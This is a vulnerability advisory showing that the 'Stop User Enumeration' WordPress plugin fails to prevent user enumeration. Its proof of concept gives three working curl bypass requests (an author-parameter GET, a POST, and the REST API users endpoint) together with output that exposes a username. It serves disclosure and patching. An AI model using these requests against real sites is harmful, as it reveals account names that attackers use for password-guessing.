Stop User Enumeration does not stop user enumeration

Score Vector Complexity Authentication Confidentiality Integrity Availability
5
Medium
Network Low None Partial None None

You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Vulnerability

Traditionally user enumeration of a WordPress site is done by making a series of requests to /?author=1 /?author=2 /?author=3 and so on (a similar effect can be achieved using POST requests too). WordPress 4.7 introduced a REST API endpoint to list all users.

This plugin attempts to prevent requests with an author parameter (but fails), and makes no attempt at preventing requests to the REST API.

Proof of concept

There are three ways to bypass this plugin’s protections.

A GET request:

$ curl -i -s 'http://localhost/?wp-comments-post&author=1'
HTTP/1.1 301 Moved Permanently
Date: Fri, 23 Dec 2016 15:38:02 GMT
Server: Apache/2.4.10 (Debian)
X-Powered-By: PHP/7.0.13
Location: http://localhost/author/tomdxw/?wp-comments-post
Content-Length: 0
Content-Type: text/html; charset=UTF-8

A POST request:

$ curl -s http://localhost/?wp-comments-post -d author=1 | grep '<title'
	<title>tomdxw – WP Test</title>

The REST API (new in WordPress 4.7):

$ curl -s http://localhost/wp-json/wp/v2/users
[{"id":1,"name":"tomdxw","url":"","description":"","link":"http:\/\/localhost\/author\/tomdxw\/","slug":"tomdxw","avatar_urls":{"24":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=24&d=mm&r=g","48":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=48&d=mm&r=g","96":"http:\/\/2.gravatar.com\/avatar\/2b5450324939bb3d1352f377950c5503?s=96&d=mm&r=g"},"meta":[],"_links":{"self":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users\/1"}],"collection":[{"href":"http:\/\/localhost\/wp-json\/wp\/v2\/users"}]}}]

Mitigation/further actions

Upgrade to version 1.3.5 or later.